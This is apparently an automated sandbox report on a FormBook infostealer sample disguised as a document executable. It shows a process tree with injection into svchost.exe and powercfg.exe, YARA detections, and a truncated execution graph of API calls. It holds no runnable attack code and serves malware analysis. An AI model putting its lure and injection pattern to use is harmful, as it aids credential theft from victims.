                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:06:40:58
                                                Start date:22/11/2024
                                                Path:C:\Users\user\Desktop\Project Breakdown Doc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Project Breakdown Doc.exe"
                                                Imagebase:0xc40000
                                                File size:1'368'576 bytes
                                                MD5 hash:BF7D24A56C64E6632FF2CA51F08908F8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:06:40:59
                                                Start date:22/11/2024
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Project Breakdown Doc.exe"
                                                Imagebase:0xd90000
                                                File size:46'504 bytes
                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:06:41:48
                                                Start date:22/11/2024
                                                Path:C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe"
                                                Imagebase:0x60000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:06:41:50
                                                Start date:22/11/2024
                                                Path:C:\Windows\SysWOW64\powercfg.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\powercfg.exe"
                                                Imagebase:0xe90000
                                                File size:78'336 bytes
                                                MD5 hash:9D71DBDD3AD017EC69554ACF9CAADD05
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:7
                                                Start time:06:42:04
                                                Start date:22/11/2024
                                                Path:C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe"
                                                Imagebase:0x60000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:8
                                                Start time:06:42:17
                                                Start date:22/11/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff6bf500000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:3.4%
                                                  Dynamic/Decrypted Code Coverage:0.9%
                                                  Signature Coverage:7.5%
                                                  Total number of Nodes:1988
                                                  Total number of Limit Nodes:170
                                                  execution_graph 97886 c41055 97891 c42649 97886->97891 97901 c477c7 97891->97901 97895 c42754 97896 c4105a 97895->97896 97909 c43416 59 API calls 2 library calls 97895->97909 97898 c62f80 97896->97898 97955 c62e84 97898->97955 97900 c41064 97910 c60ff6 97901->97910 97903 c477e8 97904 c60ff6 Mailbox 59 API calls 97903->97904 97905 c426b7 97904->97905 97906 c43582 97905->97906 97948 c435b0 97906->97948 97909->97895 97912 c60ffe 97910->97912 97913 c61018 97912->97913 97915 c6101c std::exception::exception 97912->97915 97920 c6594c 97912->97920 97937 c635e1 DecodePointer 97912->97937 97913->97903 97938 c687db RaiseException 97915->97938 97917 c61046 97939 c68711 58 API calls _free 97917->97939 97919 c61058 97919->97903 97921 c659c7 97920->97921 97929 c65958 97920->97929 97946 c635e1 DecodePointer 97921->97946 97923 c659cd 97947 c68d68 58 API calls __getptd_noexit 97923->97947 97926 c6598b RtlAllocateHeap 97927 c659bf 97926->97927 97926->97929 97927->97912 97929->97926 97930 c659b3 97929->97930 97931 c65963 97929->97931 97935 c659b1 97929->97935 97943 c635e1 DecodePointer 97929->97943 97944 c68d68 58 API calls __getptd_noexit 97930->97944 97931->97929 97940 c6a3ab 58 API calls __NMSG_WRITE 97931->97940 97941 c6a408 58 API calls 6 library calls 97931->97941 97942 c632df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97931->97942 97945 c68d68 58 API calls __getptd_noexit 97935->97945 97937->97912 97938->97917 97939->97919 97940->97931 97941->97931 97943->97929 97944->97935 97945->97927 97946->97923 97947->97927 97949 c435bd 97948->97949 97950 c435a1 97948->97950 97949->97950 97951 c435c4 RegOpenKeyExW 97949->97951 97950->97895 97951->97950 97952 c435de RegQueryValueExW 97951->97952 97953 c43614 RegCloseKey 97952->97953 97954 c435ff 97952->97954 97953->97950 97954->97953 97956 c62e90 __read 97955->97956 97963 c63457 97956->97963 97962 c62eb7 __read 97962->97900 97980 c69e4b 97963->97980 97965 c62e99 97966 c62ec8 DecodePointer DecodePointer 97965->97966 97967 c62ea5 97966->97967 97968 c62ef5 97966->97968 97977 c62ec2 97967->97977 97968->97967 98026 c689e4 59 API calls __read 97968->98026 97970 c62f07 97971 c62f58 EncodePointer EncodePointer 97970->97971 97972 c62f2c 97970->97972 98027 c68aa4 61 API calls __realloc_crt 97970->98027 97971->97967 97972->97967 97975 c62f46 EncodePointer 97972->97975 98028 c68aa4 61 API calls __realloc_crt 97972->98028 97975->97971 97976 c62f40 97976->97967 97976->97975 98029 c63460 97977->98029 97981 c69e6f EnterCriticalSection 97980->97981 97982 c69e5c 97980->97982 97981->97965 97987 c69ed3 97982->97987 97984 c69e62 97984->97981 98011 c632f5 58 API calls 3 library calls 97984->98011 97988 c69edf __read 97987->97988 97989 c69f00 97988->97989 97990 c69ee8 97988->97990 97999 c69f21 __read 97989->97999 98015 c68a5d 58 API calls 2 library calls 97989->98015 98012 c6a3ab 58 API calls __NMSG_WRITE 97990->98012 97992 c69eed 98013 c6a408 58 API calls 6 library calls 97992->98013 97995 c69f15 97997 c69f1c 97995->97997 97998 c69f2b 97995->97998 97996 c69ef4 98014 c632df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97996->98014 98016 c68d68 58 API calls __getptd_noexit 97997->98016 98002 c69e4b __lock 58 API calls 97998->98002 97999->97984 98004 c69f32 98002->98004 98005 c69f57 98004->98005 98006 c69f3f 98004->98006 98018 c62f95 98005->98018 98017 c6a06b InitializeCriticalSectionAndSpinCount 98006->98017 98009 c69f4b 98024 c69f73 LeaveCriticalSection _doexit 98009->98024 98012->97992 98013->97996 98015->97995 98016->97999 98017->98009 98019 c62f9e RtlFreeHeap 98018->98019 98020 c62fc7 _free 98018->98020 98019->98020 98021 c62fb3 98019->98021 98020->98009 98025 c68d68 58 API calls __getptd_noexit 98021->98025 98023 c62fb9 GetLastError 98023->98020 98024->97999 98025->98023 98026->97970 98027->97972 98028->97976 98032 c69fb5 LeaveCriticalSection 98029->98032 98031 c62ec7 98031->97962 98032->98031 98033 c84599 98037 c9655c 98033->98037 98035 c845a4 98036 c9655c 85 API calls 98035->98036 98036->98035 98038 c96596 98037->98038 98043 c96569 98037->98043 98038->98035 98039 c96598 98076 c49488 84 API calls Mailbox 98039->98076 98041 c9659d 98048 c49997 98041->98048 98043->98038 98043->98039 98043->98041 98046 c96590 98043->98046 98075 c49700 59 API calls _wcsstr 98046->98075 98049 c499ab 98048->98049 98050 c499b1 98048->98050 98066 c47c8e 98049->98066 98051 c7f9fc __i64tow 98050->98051 98052 c499f9 98050->98052 98054 c499b7 __itow 98050->98054 98057 c7f903 98050->98057 98081 c638d8 83 API calls 3 library calls 98052->98081 98056 c60ff6 Mailbox 59 API calls 98054->98056 98058 c499d1 98056->98058 98060 c60ff6 Mailbox 59 API calls 98057->98060 98064 c7f97b Mailbox _wcscpy 98057->98064 98058->98049 98077 c47f41 98058->98077 98061 c7f948 98060->98061 98062 c60ff6 Mailbox 59 API calls 98061->98062 98063 c7f96e 98062->98063 98063->98064 98065 c47f41 59 API calls 98063->98065 98082 c638d8 83 API calls 3 library calls 98064->98082 98065->98064 98067 c7f094 98066->98067 98068 c47ca0 98066->98068 98089 c98123 59 API calls _memmove 98067->98089 98083 c47bb1 98068->98083 98071 c7f09e 98090 c481a7 98071->98090 98072 c47cac 98072->98038 98074 c7f0a6 Mailbox 98075->98038 98076->98041 98078 c47f50 __wsetenvp _memmove 98077->98078 98079 c60ff6 Mailbox 59 API calls 98078->98079 98080 c47f8e 98079->98080 98080->98049 98081->98054 98082->98051 98084 c47bbf 98083->98084 98088 c47be5 _memmove 98083->98088 98085 c60ff6 Mailbox 59 API calls 98084->98085 98084->98088 98086 c47c34 98085->98086 98087 c60ff6 Mailbox 59 API calls 98086->98087 98087->98088 98088->98072 98089->98071 98091 c481b2 98090->98091 98092 c481ba 98090->98092 98094 c480d7 59 API calls 2 library calls 98091->98094 98092->98074 98094->98092 98095 c41066 98100 c4f8cf 98095->98100 98097 c4106c 98098 c62f80 __cinit 67 API calls 98097->98098 98099 c41076 98098->98099 98101 c4f8f0 98100->98101 98133 c60143 98101->98133 98105 c4f937 98106 c477c7 59 API calls 98105->98106 98107 c4f941 98106->98107 98108 c477c7 59 API calls 98107->98108 98109 c4f94b 98108->98109 98110 c477c7 59 API calls 98109->98110 98111 c4f955 98110->98111 98112 c477c7 59 API calls 98111->98112 98113 c4f993 98112->98113 98114 c477c7 59 API calls 98113->98114 98115 c4fa5e 98114->98115 98143 c560e7 98115->98143 98119 c4fa90 98120 c477c7 59 API calls 98119->98120 98121 c4fa9a 98120->98121 98171 c5ffde 98121->98171 98123 c4fae1 98124 c4faf1 GetStdHandle 98123->98124 98125 c4fb3d 98124->98125 98126 c849d5 98124->98126 98127 c4fb45 OleInitialize 98125->98127 98126->98125 98128 c849de 98126->98128 98127->98097 98178 ca6dda 64 API calls Mailbox 98128->98178 98130 c849e5 98179 ca74a9 CreateThread 98130->98179 98132 c849f1 CloseHandle 98132->98127 98180 c6021c 98133->98180 98136 c6021c 59 API calls 98137 c60185 98136->98137 98138 c477c7 59 API calls 98137->98138 98139 c60191 98138->98139 98187 c47d2c 98139->98187 98141 c4f8f6 98142 c603a2 6 API calls 98141->98142 98142->98105 98144 c477c7 59 API calls 98143->98144 98145 c560f7 98144->98145 98146 c477c7 59 API calls 98145->98146 98147 c560ff 98146->98147 98208 c55bfd 98147->98208 98150 c55bfd 59 API calls 98151 c5610f 98150->98151 98152 c477c7 59 API calls 98151->98152 98153 c5611a 98152->98153 98154 c60ff6 Mailbox 59 API calls 98153->98154 98155 c4fa68 98154->98155 98156 c56259 98155->98156 98157 c56267 98156->98157 98158 c477c7 59 API calls 98157->98158 98159 c56272 98158->98159 98160 c477c7 59 API calls 98159->98160 98161 c5627d 98160->98161 98162 c477c7 59 API calls 98161->98162 98163 c56288 98162->98163 98164 c477c7 59 API calls 98163->98164 98165 c56293 98164->98165 98166 c55bfd 59 API calls 98165->98166 98167 c5629e 98166->98167 98168 c60ff6 Mailbox 59 API calls 98167->98168 98169 c562a5 RegisterWindowMessageW 98168->98169 98169->98119 98172 c95cc3 98171->98172 98173 c5ffee 98171->98173 98211 ca9d71 60 API calls 98172->98211 98175 c60ff6 Mailbox 59 API calls 98173->98175 98177 c5fff6 98175->98177 98176 c95cce 98177->98123 98178->98130 98179->98132 98212 ca748f 65 API calls 98179->98212 98181 c477c7 59 API calls 98180->98181 98182 c60227 98181->98182 98183 c477c7 59 API calls 98182->98183 98184 c6022f 98183->98184 98185 c477c7 59 API calls 98184->98185 98186 c6017b 98185->98186 98186->98136 98188 c47da5 98187->98188 98189 c47d38 __wsetenvp 98187->98189 98200 c47e8c 98188->98200 98192 c47d73 98189->98192 98193 c47d4e 98189->98193 98191 c47d56 _memmove 98191->98141 98197 c48189 98192->98197 98196 c48087 59 API calls Mailbox 98193->98196 98196->98191 98198 c60ff6 Mailbox 59 API calls 98197->98198 98199 c48193 98198->98199 98199->98191 98201 c47e9a 98200->98201 98203 c47ea3 _memmove 98200->98203 98201->98203 98204 c47faf 98201->98204 98203->98191 98205 c47fc2 98204->98205 98207 c47fbf _memmove 98204->98207 98206 c60ff6 Mailbox 59 API calls 98205->98206 98206->98207 98207->98203 98209 c477c7 59 API calls 98208->98209 98210 c55c05 98209->98210 98210->98150 98211->98176 98213 c41016 98218 c44ad2 98213->98218 98216 c62f80 __cinit 67 API calls 98217 c41025 98216->98217 98219 c60ff6 Mailbox 59 API calls 98218->98219 98220 c44ada 98219->98220 98221 c4101b 98220->98221 98225 c44a94 98220->98225 98221->98216 98226 c44aaf 98225->98226 98227 c44a9d 98225->98227 98229 c44afe 98226->98229 98228 c62f80 __cinit 67 API calls 98227->98228 98228->98226 98230 c477c7 59 API calls 98229->98230 98231 c44b16 GetVersionExW 98230->98231 98232 c47d2c 59 API calls 98231->98232 98233 c44b59 98232->98233 98234 c47e8c 59 API calls 98233->98234 98243 c44b86 98233->98243 98235 c44b7a 98234->98235 98257 c47886 98235->98257 98237 c44bf1 GetCurrentProcess IsWow64Process 98238 c44c0a 98237->98238 98240 c44c20 98238->98240 98241 c44c89 GetSystemInfo 98238->98241 98239 c7dc8d 98253 c44c95 98240->98253 98242 c44c56 98241->98242 98242->98221 98243->98237 98243->98239 98246 c44c32 98248 c44c95 2 API calls 98246->98248 98247 c44c7d GetSystemInfo 98249 c44c47 98247->98249 98250 c44c3a GetNativeSystemInfo 98248->98250 98249->98242 98251 c44c4d FreeLibrary 98249->98251 98250->98249 98251->98242 98254 c44c2e 98253->98254 98255 c44c9e LoadLibraryA 98253->98255 98254->98246 98254->98247 98255->98254 98256 c44caf GetProcAddress 98255->98256 98256->98254 98258 c47894 98257->98258 98259 c47e8c 59 API calls 98258->98259 98260 c478a4 98259->98260 98260->98243 98261 c67e93 98262 c67e9f __read 98261->98262 98298 c6a048 GetStartupInfoW 98262->98298 98264 c67ea4 98300 c68dbc GetProcessHeap 98264->98300 98266 c67efc 98267 c67f07 98266->98267 98383 c67fe3 58 API calls 3 library calls 98266->98383 98301 c69d26 98267->98301 98270 c67f0d 98271 c67f18 __RTC_Initialize 98270->98271 98384 c67fe3 58 API calls 3 library calls 98270->98384 98322 c6d812 98271->98322 98274 c67f27 98275 c67f33 GetCommandLineW 98274->98275 98385 c67fe3 58 API calls 3 library calls 98274->98385 98341 c75173 GetEnvironmentStringsW 98275->98341 98278 c67f32 98278->98275 98281 c67f4d 98282 c67f58 98281->98282 98386 c632f5 58 API calls 3 library calls 98281->98386 98351 c74fa8 98282->98351 98285 c67f5e 98286 c67f69 98285->98286 98387 c632f5 58 API calls 3 library calls 98285->98387 98365 c6332f 98286->98365 98289 c67f71 98290 c67f7c __wwincmdln 98289->98290 98388 c632f5 58 API calls 3 library calls 98289->98388 98371 c4492e 98290->98371 98293 c67f90 98294 c67f9f 98293->98294 98389 c63598 58 API calls _doexit 98293->98389 98390 c63320 58 API calls _doexit 98294->98390 98297 c67fa4 __read 98299 c6a05e 98298->98299 98299->98264 98300->98266 98391 c633c7 36 API calls 2 library calls 98301->98391 98303 c69d2b 98392 c69f7c InitializeCriticalSectionAndSpinCount __mtinitlocks 98303->98392 98305 c69d30 98306 c69d34 98305->98306 98394 c69fca TlsAlloc 98305->98394 98393 c69d9c 61 API calls 2 library calls 98306->98393 98309 c69d39 98309->98270 98310 c69d46 98310->98306 98311 c69d51 98310->98311 98395 c68a15 98311->98395 98314 c69d93 98403 c69d9c 61 API calls 2 library calls 98314->98403 98317 c69d98 98317->98270 98318 c69d72 98318->98314 98319 c69d78 98318->98319 98402 c69c73 58 API calls 4 library calls 98319->98402 98321 c69d80 GetCurrentThreadId 98321->98270 98323 c6d81e __read 98322->98323 98324 c69e4b __lock 58 API calls 98323->98324 98325 c6d825 98324->98325 98326 c68a15 __calloc_crt 58 API calls 98325->98326 98327 c6d836 98326->98327 98328 c6d8a1 GetStartupInfoW 98327->98328 98329 c6d841 @_EH4_CallFilterFunc@8 __read 98327->98329 98330 c6d9e5 98328->98330 98332 c6d8b6 98328->98332 98329->98274 98331 c6daad 98330->98331 98335 c6da32 GetStdHandle 98330->98335 98336 c6da45 GetFileType 98330->98336 98416 c6a06b InitializeCriticalSectionAndSpinCount 98330->98416 98417 c6dabd LeaveCriticalSection _doexit 98331->98417 98332->98330 98334 c68a15 __calloc_crt 58 API calls 98332->98334 98337 c6d904 98332->98337 98334->98332 98335->98330 98336->98330 98337->98330 98338 c6d938 GetFileType 98337->98338 98415 c6a06b InitializeCriticalSectionAndSpinCount 98337->98415 98338->98337 98342 c75184 98341->98342 98343 c67f43 98341->98343 98418 c68a5d 58 API calls 2 library calls 98342->98418 98347 c74d6b GetModuleFileNameW 98343->98347 98345 c751aa _memmove 98346 c751c0 FreeEnvironmentStringsW 98345->98346 98346->98343 98348 c74d9f _wparse_cmdline 98347->98348 98350 c74ddf _wparse_cmdline 98348->98350 98419 c68a5d 58 API calls 2 library calls 98348->98419 98350->98281 98352 c74fc1 __wsetenvp 98351->98352 98353 c74fb9 98351->98353 98354 c68a15 __calloc_crt 58 API calls 98352->98354 98353->98285 98357 c74fea __wsetenvp 98354->98357 98355 c75041 98356 c62f95 _free 58 API calls 98355->98356 98356->98353 98357->98353 98357->98355 98358 c68a15 __calloc_crt 58 API calls 98357->98358 98359 c75066 98357->98359 98362 c7507d 98357->98362 98420 c74857 58 API calls __read 98357->98420 98358->98357 98360 c62f95 _free 58 API calls 98359->98360 98360->98353 98421 c69006 IsProcessorFeaturePresent 98362->98421 98364 c75089 98364->98285 98366 c6333b __IsNonwritableInCurrentImage 98365->98366 98444 c6a711 98366->98444 98368 c63359 __initterm_e 98369 c62f80 __cinit 67 API calls 98368->98369 98370 c63378 __cinit __IsNonwritableInCurrentImage 98368->98370 98369->98370 98370->98289 98372 c44948 98371->98372 98382 c449e7 98371->98382 98373 c44982 IsThemeActive 98372->98373 98447 c635ac 98373->98447 98377 c449ae 98459 c44a5b SystemParametersInfoW SystemParametersInfoW 98377->98459 98379 c449ba 98460 c43b4c 98379->98460 98381 c449c2 SystemParametersInfoW 98381->98382 98382->98293 98383->98267 98384->98271 98385->98278 98389->98294 98390->98297 98391->98303 98392->98305 98393->98309 98394->98310 98396 c68a1c 98395->98396 98398 c68a57 98396->98398 98400 c68a3a 98396->98400 98404 c75446 98396->98404 98398->98314 98401 c6a026 TlsSetValue 98398->98401 98400->98396 98400->98398 98412 c6a372 Sleep 98400->98412 98401->98318 98402->98321 98403->98317 98405 c75451 98404->98405 98407 c7546c 98404->98407 98406 c7545d 98405->98406 98405->98407 98413 c68d68 58 API calls __getptd_noexit 98406->98413 98409 c7547c HeapAlloc 98407->98409 98410 c75462 98407->98410 98414 c635e1 DecodePointer 98407->98414 98409->98407 98409->98410 98410->98396 98412->98400 98413->98410 98414->98407 98415->98337 98416->98330 98417->98329 98418->98345 98419->98350 98420->98357 98422 c69011 98421->98422 98427 c68e99 98422->98427 98426 c6902c 98426->98364 98428 c68eb3 _memset __call_reportfault 98427->98428 98429 c68ed3 IsDebuggerPresent 98428->98429 98435 c6a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98429->98435 98432 c68fba 98434 c6a380 GetCurrentProcess TerminateProcess 98432->98434 98433 c68f97 __call_reportfault 98436 c6c836 98433->98436 98434->98426 98435->98433 98437 c6c840 IsProcessorFeaturePresent 98436->98437 98438 c6c83e 98436->98438 98440 c75b5a 98437->98440 98438->98432 98443 c75b09 5 API calls 2 library calls 98440->98443 98442 c75c3d 98442->98432 98443->98442 98445 c6a714 EncodePointer 98444->98445 98445->98445 98446 c6a72e 98445->98446 98446->98368 98448 c69e4b __lock 58 API calls 98447->98448 98449 c635b7 DecodePointer EncodePointer 98448->98449 98512 c69fb5 LeaveCriticalSection 98449->98512 98451 c449a7 98452 c63614 98451->98452 98453 c6361e 98452->98453 98454 c63638 98452->98454 98453->98454 98513 c68d68 58 API calls __getptd_noexit 98453->98513 98454->98377 98456 c63628 98514 c68ff6 9 API calls __read 98456->98514 98458 c63633 98458->98377 98459->98379 98461 c43b59 __ftell_nolock 98460->98461 98462 c477c7 59 API calls 98461->98462 98463 c43b63 GetCurrentDirectoryW 98462->98463 98515 c43778 98463->98515 98465 c43b8c IsDebuggerPresent 98466 c7d4ad MessageBoxA 98465->98466 98467 c43b9a 98465->98467 98469 c7d4c7 98466->98469 98467->98469 98470 c43bb7 98467->98470 98500 c43c73 98467->98500 98468 c43c7a SetCurrentDirectoryW 98471 c43c87 Mailbox 98468->98471 98725 c47373 59 API calls Mailbox 98469->98725 98596 c473e5 98470->98596 98471->98381 98474 c7d4d7 98479 c7d4ed SetCurrentDirectoryW 98474->98479 98476 c43bd5 GetFullPathNameW 98477 c47d2c 59 API calls 98476->98477 98478 c43c10 98477->98478 98612 c50a8d 98478->98612 98479->98471 98482 c43c2e 98483 c43c38 98482->98483 98726 ca4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98482->98726 98628 c43a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98483->98628 98486 c7d50a 98486->98483 98489 c7d51b 98486->98489 98727 c44864 98489->98727 98490 c43c42 98492 c43c55 98490->98492 98636 c443db 98490->98636 98647 c50b30 98492->98647 98493 c7d523 98496 c47f41 59 API calls 98493->98496 98498 c7d530 98496->98498 98497 c43c60 98497->98500 98724 c444cb Shell_NotifyIconW _memset 98497->98724 98501 c7d55f 98498->98501 98502 c7d53a 98498->98502 98500->98468 98503 c47e0b 59 API calls 98501->98503 98734 c47e0b 98502->98734 98505 c7d55b GetForegroundWindow ShellExecuteW 98503->98505 98509 c7d58f Mailbox 98505->98509 98508 c47c8e 59 API calls 98510 c7d552 98508->98510 98509->98500 98511 c47e0b 59 API calls 98510->98511 98511->98505 98512->98451 98513->98456 98514->98458 98516 c477c7 59 API calls 98515->98516 98517 c4378e 98516->98517 98741 c43d43 98517->98741 98519 c437ac 98520 c44864 61 API calls 98519->98520 98521 c437c0 98520->98521 98522 c47f41 59 API calls 98521->98522 98523 c437cd 98522->98523 98755 c44f3d 98523->98755 98526 c7d3ae 98822 ca97e5 98526->98822 98527 c437ee Mailbox 98530 c481a7 59 API calls 98527->98530 98533 c43801 98530->98533 98531 c7d3cd 98532 c62f95 _free 58 API calls 98531->98532 98535 c7d3da 98532->98535 98779 c493ea 98533->98779 98537 c44faa 84 API calls 98535->98537 98539 c7d3e3 98537->98539 98543 c43ee2 59 API calls 98539->98543 98540 c47f41 59 API calls 98541 c4381a 98540->98541 98782 c48620 98541->98782 98545 c7d3fe 98543->98545 98544 c4382c Mailbox 98546 c47f41 59 API calls 98544->98546 98547 c43ee2 59 API calls 98545->98547 98548 c43852 98546->98548 98549 c7d41a 98547->98549 98550 c48620 69 API calls 98548->98550 98552 c44864 61 API calls 98549->98552 98551 c43861 Mailbox 98550->98551 98556 c477c7 59 API calls 98551->98556 98553 c7d43f 98552->98553 98554 c43ee2 59 API calls 98553->98554 98555 c7d44b 98554->98555 98557 c481a7 59 API calls 98555->98557 98558 c4387f 98556->98558 98559 c7d459 98557->98559 98786 c43ee2 98558->98786 98561 c43ee2 59 API calls 98559->98561 98563 c7d468 98561->98563 98569 c481a7 59 API calls 98563->98569 98565 c43899 98565->98539 98566 c438a3 98565->98566 98567 c6313d _W_store_winword 60 API calls 98566->98567 98568 c438ae 98567->98568 98568->98545 98570 c438b8 98568->98570 98571 c7d48a 98569->98571 98572 c6313d _W_store_winword 60 API calls 98570->98572 98573 c43ee2 59 API calls 98571->98573 98574 c438c3 98572->98574 98575 c7d497 98573->98575 98574->98549 98576 c438cd 98574->98576 98575->98575 98577 c6313d _W_store_winword 60 API calls 98576->98577 98578 c438d8 98577->98578 98578->98563 98579 c43919 98578->98579 98581 c43ee2 59 API calls 98578->98581 98579->98563 98580 c43926 98579->98580 98802 c4942e 98580->98802 98582 c438fc 98581->98582 98584 c481a7 59 API calls 98582->98584 98586 c4390a 98584->98586 98588 c43ee2 59 API calls 98586->98588 98588->98579 98591 c493ea 59 API calls 98593 c43961 98591->98593 98592 c49040 60 API calls 98592->98593 98593->98591 98593->98592 98594 c43ee2 59 API calls 98593->98594 98595 c439a7 Mailbox 98593->98595 98594->98593 98595->98465 98597 c473f2 __ftell_nolock 98596->98597 98598 c7ee4b _memset 98597->98598 98599 c4740b 98597->98599 98601 c7ee67 GetOpenFileNameW 98598->98601 99439 c448ae 98599->99439 98604 c7eeb6 98601->98604 98606 c47d2c 59 API calls 98604->98606 98608 c7eecb 98606->98608 98608->98608 98609 c47429 99467 c469ca 98609->99467 98613 c50a9a __ftell_nolock 98612->98613 99725 c46ee0 98613->99725 98615 c50a9f 98627 c43c26 98615->98627 99736 c512fe 89 API calls 98615->99736 98617 c50aac 98617->98627 99737 c54047 91 API calls Mailbox 98617->99737 98619 c50ab5 98620 c50ab9 GetFullPathNameW 98619->98620 98619->98627 98621 c47d2c 59 API calls 98620->98621 98622 c50ae5 98621->98622 98623 c47d2c 59 API calls 98622->98623 98625 c50af2 98623->98625 98624 c850d5 _wcscat 98625->98624 98626 c47d2c 59 API calls 98625->98626 98626->98627 98627->98474 98627->98482 98629 c43ac2 LoadImageW RegisterClassExW 98628->98629 98630 